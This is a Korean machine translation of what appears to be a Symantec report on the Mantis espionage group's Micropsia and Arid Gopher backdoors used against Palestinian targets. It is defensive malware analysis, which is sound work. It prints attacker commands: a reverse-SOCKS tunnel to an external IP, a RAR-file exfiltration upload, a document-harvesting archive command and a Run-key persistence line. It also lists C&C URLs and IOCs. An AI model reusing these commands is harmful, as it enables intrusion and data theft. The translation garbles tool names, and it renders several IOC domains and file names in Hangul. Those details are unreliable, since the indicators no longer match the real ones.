Mantis: 팔레스타인 표적 공격에 사용되는 새로운 도구

간첩 그룹은 탐지를 피하고 손상된 네트워크를 유지하기 위해 시간과 노력을 투자합니다.
팔레스타인 영토 내에서 활동하는 것으로 추정되는 위협 행위자인 Mantis 사이버 스파이 그룹(일명 Arid Viper, Desert Falcon, APT-C-23)은 지속적인 공격을 수행하고 업데이트된 도구 세트를 배포하며 목표물을 표적으로 삼기 위해 노력을 아끼지 않고 있습니다. 웹에 지속적으로 존재합니다.
이 그룹은 중동의 조직을 표적으로 삼는 것으로 알려져 있지만, Broadcom Software의 자회사인 Symantec이 최근 발견한 활동은 팔레스타인 영토의 조직에 초점을 맞추고 있습니다. 악성 활동은 2022년 9월에 시작되어 최소 2023년 2월까지 지속되었습니다. 달. 이런 종류의 표적화는 지난 2017년 팔레스타인 영토에 거주하는 개인을 대상으로 한 공격을 폭로한 맨티스(Mantis) 그룹에게 전례 없는 일이 아니다.

컨텍스트

Mantis는 2014년부터 활동했으며, 일부 타사 보고서에 따르면 2011년부터 활동했을 수도 있다고 합니다. 이 그룹은 이스라엘과 다른 여러 중동 국가의 조직을 표적으로 삼는 것으로 알려져 있습니다. 공격 대상에는 정부, 군사, 금융, 미디어, 교육, 에너지 및 싱크탱크가 포함됩니다. 이 그룹은 피싱 이메일과 가짜 소셜 미디어 프로필을 사용하여 공격 대상의 디바이스에 멀웨어를 설치하도록 유인하는 것으로 알려져 있습니다.

맨티스는 팔레스타인 지역과 관련이 있는 것으로 널리 알려져 있습니다. 시만텍은 어떤 팔레스타인 조직과도 연관성이 있다고 단정할 수 없지만, 다른 공급업체들은 이 그룹을 하마스와 연관짓고 있습니다.

최근 공격에서 이 그룹은 업데이트된 버전의 맞춤형 마이크로시아와 아리드 고퍼 백도어를 사용하여 표적을 감염시킨 후 광범위한 자격 증명 도용과 탈취한 데이터의 유출을 감행했습니다.

공격 체인

이 캠페인의 초기 감염 경로는 명확하지 않습니다. 공격 대상 중 한 조직에서는 공격자가 세 대의 컴퓨터에 동일한 도구 세트의 세 가지 버전(즉, 동일한 도구의 다른 변종)을 배포했습니다. 이러한 방식으로 공격을 격리하는 것은 예방 조치일 가능성이 높습니다. 도구 세트 중 하나가 발견되더라도 공격자는 여전히 대상 네트워크에서 지속적인 존재감을 유지할 수 있습니다.

다음은 세 가지 도구 세트 중 하나의 사용법에 대한 설명입니다:

악성 활동은 2022년 12월 18일에 처음 탐지되었습니다. 내장된 셸코드를 실행하는 Base64 인코딩 문자열을 로드하기 위해 세 개의 개별적인 난독화된 PowerShell 명령 세트가 실행되었습니다. 셸코드는 기본 TCP 프로토콜을 사용하여 명령 및 제어(C&C) 서버에서 셸코드를 다운로드하는 32비트 부트로더입니다: 104.194.222[...] 50 포트 4444로 다른 단계를 다운로드합니다.

공격자들은 12월 19일에 다시 돌아와 먼저 크리덴셜 덤프를 수행한 다음 Certutil과 BITSAdmin을 사용하여 Micropsia 백도어와 공개적으로 사용 가능한 SSH 클라이언트인 Putty를 다운로드했습니다.

그런 다음 Micropsia가 실행되어 C&C 서버에 접속하기 시작했습니다. 같은 날 같은 조직에 있는 다른 세 대의 컴퓨터에서도 Micropsia가 실행되었습니다. 각각의 경우 파일 이름의 이름을 딴 폴더에서 실행되었습니다:

csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
한 컴퓨터에서는 Micropsia를 사용하여 외부 IP 주소로 역방향 양말 터널을 설정했습니다:

CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.] 50:443 [편집됨]

12월 20일, 감염된 컴퓨터 중 하나에서 창패키지.exe라는 알 수 없는 실행 파일을 실행하는 데 Micropsia가 사용되었습니다.

다음 날인 12월 21일, 감염된 다른 컴퓨터에 파일을 보관하기 위해 RAR이 실행되었습니다.

12월 22일부터 2023년 1월 2일까지 감염된 컴퓨터 세 대에서 Arid Gopher 백도어를 실행하는 데 사용되었으며, Arid Gopher는 레지스트리에 추가하여 재부팅 시 Arid Gopher 실행을 제공하는 SetRegRunKey.exe라는 도구를 실행하는 데 사용되었습니다. 지속성을 제공합니다. 또한 localsecuritypolicy.exe라는 알 수 없는 파일을 실행합니다(공격자는 이 파일 이름을 다른 곳에서 Arid Gopher 백도어로 사용함).

12월 28일에는 다른 세 대의 감염된 컴퓨터에서 윈도우패키지.exe를 실행하는 데 Micropsia가 사용되었습니다.

12월 31일, Arid Gopher는 감염된 두 대의 컴퓨터에서 networkswitcherdatamodell.exe 및 networkuefidiagsbootserver.exe라는 이름의 알 수 없는 파일 두 개를 실행했습니다.

1월 2일까지 공격자들은 사용하던 Arid Gopher의 버전을 비활성화하고 새로운 변종을 도입했습니다. 이것이 첫 번째 버전이 발견되었기 때문인지 아니면 표준 운영 절차 때문인지는 명확하지 않습니다.

1월 4일, Micropsia는 한 대의 컴퓨터에서 csidl_common_appdata\hostupbroker\hostupbroker.exe 폴더에서 hostupbroker.exe라는 이름의 알 수 없는 파일 두 개를 실행하는 데 사용되었고, 바로 이어서 RAR 파일이 유출되었습니다:

CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar

1월 9일, 한 대의 컴퓨터에서 알 수 없는 파일 두 개를 실행하는 데 Arid Gopher가 사용되었습니다:

csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
csidl_common_appdata\embeddedmodeservice\embeddedmodeservice.exe
마지막 악성 활동은 1월 12일 이후에 발생했는데, 이 때 Arid Gopher는 알 수 없는 파일 이름 localsecuritypolicy.exe를 10시간마다 실행하는 데 사용되었습니다.

마이크로피아

이 공격에 사용된 Micropsia 백도어 변종은 다른 공급업체에서 발견된 버전에서 약간 업데이트된 버전인 것으로 보입니다. 이 캠페인에서는 여러 파일 이름과 파일 경로를 사용하여 Micropsia가 배포되었습니다:

csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
csidl_common_appdata\마이크로소프트서비스사용설명서\시스템프로퍼티internationaltime.exe
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
Micropsia는 실행을 위해 WMI를 사용하며, 주요 목적은 공격자의 보조 페이로드를 실행하는 것으로 보입니다. 여기에는 다음이 포함됩니다:

Arid Gopher(파일 이름: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
리버스 양말 터널러(일명 Revsocks)(파일 이름: windowsservicemanageav.exe)
데이터 유출 도구(파일 이름: windowsupserv.exe)
호스트업브로커.exe라는 이름의 알 수 없는 파일 두 개
알 수 없는 파일 이름 windowspackages.exe
또한 Micropsia는 데이터 유출에 대비하여 스크린샷, 키 로깅, WinRAR을 사용한 특정 파일 유형 보관과 같은 자체 기능을 제공합니다:

"%PROGRAMDATA%\소프트웨어 배포\WinRAR\Rar.exe" a-r -ep1 -v2500k - hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 "%PROGRAMDATA%\Software Distributions\Bdl\LMth__C_2023-02-13 17-14-41" "%USERPROFILE%*.xls" " %USERPROFILE%*.xlsx" "%USERPROFILE%*.doc" "%USERPROFILE%*. docx" "%USERPROFILE%*.csv" "%USERPROFILE%*.pdf" "%USERPROFILE%*.ppt" "%USERPROFILE%*.pptx" " %USERPROFILE%*.odt" "%USERPROFILE%*.mdb" "%USERPROFILE%*. accdb" "%USERPROFILE%*.accde" "%USERPROFILE%*.txt" "%USERPROFILE%*.rtf" "%USERPROFILE%*.vcf"

아리드 고퍼

델파이로 작성된 마이크로시아와 달리, 아레드 고퍼는 Go로 작성되었습니다. 이 캠페인에 사용된 Arid Gopher 버전에는 다음과 같은 임베디드 구성 요소가 포함되어 있습니다:

7za.exe - 7-Zip 실행 파일의 합법적인 사본
AttestationWmiProvider.exe - "실행" 레지스트리 값을 설정하는 도구
ServiceHubIdentityHost.exe - 옵티멈 X의 합법적인 Shortcut.exe 실행 파일 사본
Setup.env - 구성 파일
Arid Gopher는 또한 다음과 같은 알 수 없는 파일을 실행하는 데 사용됩니다: networkswitcherdatamodell.exe, localsecuritypolicy.exe 및 networkuefidiagsbootserver.exe, 그리고 다음을 사용하여 난독화된 파일을 다운로드 및 실행하는 것 외에도 PyArmor 난독화된 파일을 다운로드하고 실행합니다.

C&C 서버와 통신할 때 Arid Gopher는 장치를 한 경로에 등록한 다음 다른 경로에 연결하여 명령을 수신할 수 있습니다:

연결: http://jumpstartmail[.] com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]) 134) - 장치를 등록하기 위해서일 수 있습니다.
다음: http://jumpstartmail[...] com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - 아마도 명령을 수신하기 위해
연결: http://salimafia[.] net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]) 32) - 장치를 등록하기 위해서일 수 있습니다.
다음: http://salimafia[...] net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - 아마도 명령을 수신하기 위해

공격자가 정기적으로 업데이트하고 재작성하여 탐지를 회피하는 것으로 보입니다. 멀웨어의 한 변종은 이전 버전의 고유 코드와 너무 달라서 하위 루틴에 이전 버전과 동일한 고유 코드가 포함되어 있지 않습니다. Mantis는 변종 간에 로직을 적극적으로 전환하는 것으로 보이며, 수동으로 수행하면 시간이 많이 소요되는 작업입니다.

명령 설명
"c" main.exC("cmd")와 관련이 있을 수 있습니다.
"d" main.down2와 관련이 있을 수 있습니다.
"s" main.OnDSH와 관련이 있을 수 있습니다.
"ci" main.deviceProperties와 관련이 있을 수 있습니다.
"ps" 아마도 main.exC("powershell")와 관련이 있을 것입니다.
"ra" 아마도 main.RunAWithoutW와 관련이 있을 것입니다.
"sf" main.updateSettings와 관련이 있을 수 있습니다.
"sl" main.searchForLogs와 관련이 있을 수 있습니다.
"ua" main.updateApp과 관련이 있을 수 있습니다.
"ut" 아마도 main.updateT와 관련이 있을 것입니다.
"pwnr" 아마도 main.exCWithoutW("powershell")와 관련이 있을 것입니다.
"rapp" main.restartApp과 관련이 있을 수 있습니다.
"gelog" main.upAppLogs와 관련이 있을 수 있습니다.
"ufbtt" main.collectFi와 관련이 있을 수 있습니다.
"ufofd" main.collectFiOrFol과 관련이 있을 수 있습니다.
"bwp" main.browDat와 관련이 있을 수 있습니다.
"cbh" main.delBD와 관련이 있을 수 있습니다.
"cwr" main.exCWithoutW("cmd")와 관련이 있을 수 있습니다.
"gaf" main.collectFi와 관련이 있을 수 있습니다.
"ntf" main.collectNet과 관련이 있을 수 있습니다.
"smr" main.updateSettings와 관련이 있을 수 있습니다.

임베디드된 setup.env 파일은 분석된 Arid Gopher 변형에서 구성 데이터를 검색하는 데 사용되며 다음을 포함합니다:

DIR=WindowsPerceptionService

ENDPOINT=http://jumpstartmail[.] com/IURTIER3BNV4ER

LOGS=logs.txt

DID=code.txt

VER=6.1

EN=2

ST_METHOD=r

ST_MACHINE=false

ST_FLAGS=x

COMPRESSOR=7za.exe

DDIR=자원 파일

BW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002

SERVER_TOKEN=PDqMKZ91l2XDmDELOrKB

STAPP=AttestationWmiProvider.exe

SHORT_APP=서비스허브아이덴티티호스트.exe

setup.env 구성 파일은 Arid Gopher에 포함된 또 다른 파일인 AttestationWmiProvider.exe를 참조합니다. 이 파일은 재부팅 시 다른 실행 파일이 실행되도록 하기 위한 도우미로 사용되는 32비트 실행 파일입니다. 이 파일이 실행되면 다음 명령줄 매개 변수를 확인합니다:

"키" 문자열 인수 [RUN_VALUE_NAME] 포함

"값", 문자열 인수 [RUN_PATHNAME] 포함

그런 다음 함수 os/signal.Notify()를 사용하여 신호로부터 알림을 받도록 준비합니다. 알림을 받으면 다음 레지스트리 값을 설정합니다:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "[실행_값_이름]" = "[실행_. PATHNAME]"

지금까지의 조사에 따르면 이 파일은 재부팅 시 Arid Gopher를 실행하도록 설정합니다:

CSIDL_COMMON_APPDATA\attestationwmiprovider\attestationwmiprovider.exe -key=네트워크 가상화 시작 서비스 "-value= CSIDL_COMMON_APPDATA\네트워크가상화스타트서비스\네트워크가상화스타트서비스.exe -x"

데이터 유출 도구

공격자들은 또한 공격 대상 조직에서 탈취한 데이터를 유출하기 위해 사용자 지정 도구, 즉 WindowsUpServ.exe라는 64비트 PyInstaller 실행 파일을 사용했습니다. 이 도구는 실행 시 다음 명령줄 매개변수를 확인합니다:

"-d" "[파일_디렉토리]"

"-f" "[파일 이름]"

각 "-f" "[파일명]" 명령줄 인자에 대해 도구는 [파일명]의 내용을 업로드합니다. 각 "-d" "[파일 디렉토리]" 명령줄 인자에 대해 도구는 [파일 디렉토리] 폴더에 저장된 파일 목록을 가져와 각 파일의 내용을 업로드합니다.

각 파일을 업로드할 때 도구는 다음 매개변수와 함께 HTTP POST 요청을 C&C 서버로 보냅니다:

"kjdfnqweb": [THE_FILE_CONTENT]

"qyiwekq": [호스트 이름_오브_더_영향받은_컴퓨터]

원격 서버가 상태 코드 200으로 응답할 때마다 멀웨어는 로컬 디스크에서 업로드된 파일을 삭제합니다. 멀웨어는 또한 다음 파일에 일부 동작을 기록할 수 있습니다:

"C:\ProgramData\WindowsUpServ\success.txt"

"C:\ProgramData\WindowsUpServ\err.txt"

단호한 상대

광범위한 멀웨어 재작성과 개별 조직에 대한 공격을 여러 부분으로 분할하여 전체 공격이 탐지될 가능성을 줄이는 능력에서 알 수 있듯이, 맨티스는 성공 가능성을 극대화하기 위해 시간과 노력을 기꺼이 투자하는 결단력 있는 공격자로 보입니다.

IOC 지표

SHA256 해시 파일 이름 설명
0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311 networkvirtualizationservice.exe 아리드 고퍼
3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529 네트워크 가상화 사진 서비스 아리드 고퍼
82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4 networkvirtualizationfiaservice.exe 아리드 고퍼
85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097 네트워크 가상화 inithservice.exe 아리드 고퍼
cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 networkvirtualizationfiaservice.exe 아리드 고퍼
f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8 네트워크 가상화 스타트 서비스 아리드 고퍼
21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 AttestationWmiProvider.exe 아레드 고퍼 지속성 구성 요소
58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724 windowsupserv.exe 유출 도구
5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e windowsupserv.exe 유출 도구
0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 다양한 마이크로피아
1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa N/A 마이크로피아
211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d xboxaccessorymanagementservice.exe 마이크로피아
d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798 systempropertiesinternationaltime.exe 마이크로피아
5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4 네트워크 가상화 서비스 가능한 건조한 고퍼
f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203 runme.exe 가능한 계량기
c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b systempropertiesinternationaltime.exe 가능한 미세증
f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb windowsservicemanageav.exe 리버스삭스 터널
411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299 N/A 셸코드
5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d N/A 셸코드
6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 N/A 셸코드
11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e SystemPropertiesInternationalTime.rar 알 수 없는 파일
1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6 networkswitcherdatamodel.exe 알 수 없는 파일
220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c hostupbroker.exe 알 수 없는 파일
4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f hostupbroker.exe 알 수 없는 파일
4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 windowspackages.exe 알 수 없는 파일
624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689 _pytransform.dll 알 수 없는 파일
7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4 embeddedmodeservice.exe 알 수 없는 파일
8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2 localsecuritypolicy.exe 알 수 없는 파일
b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 embeddedmodeservice.exe 알 수 없는 파일
bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51 localsecuritypolicy.exe 알 수 없는 파일
bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9 networkuefidiagsbootserver.exe 알 수 없는 파일
d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842 teamviewrremoteservice.exe 알 수 없는 파일
jumpstartmail[.] com 아리드 고퍼 C&C
paydayloansnew[.] com 아리드 고퍼 C&C
picture-world[.] 정보 아리드 고퍼 C&C
rnacgroup[.] com C&C
살리마피아[...] net 아리드 고퍼 C&C
seomoi[...] net 아리드 고퍼 C&C
soft-utils[.] com C&C
chloe-boreman[.] com 마이크로피아 C&C
크리스톤 콜[.] com 마이크로피아 C&C
http://5.182.39[.] 44/ESUZMWMRTATJJ/CMSNVBYAWTTF/MKXNHQWDYWBU 유출 도구 C&C

 

최고 보안 책임자의 원본 기사, 복제할 경우 출처 표시: https://cncso.com/kr/팔레스타인-표적에-대한-공격에-사용된-사마귀-html

좋다 (1)
이전의 2023년 11월 29일 오후10:01
다음 2023년 12월 3일 9:11

관련 제안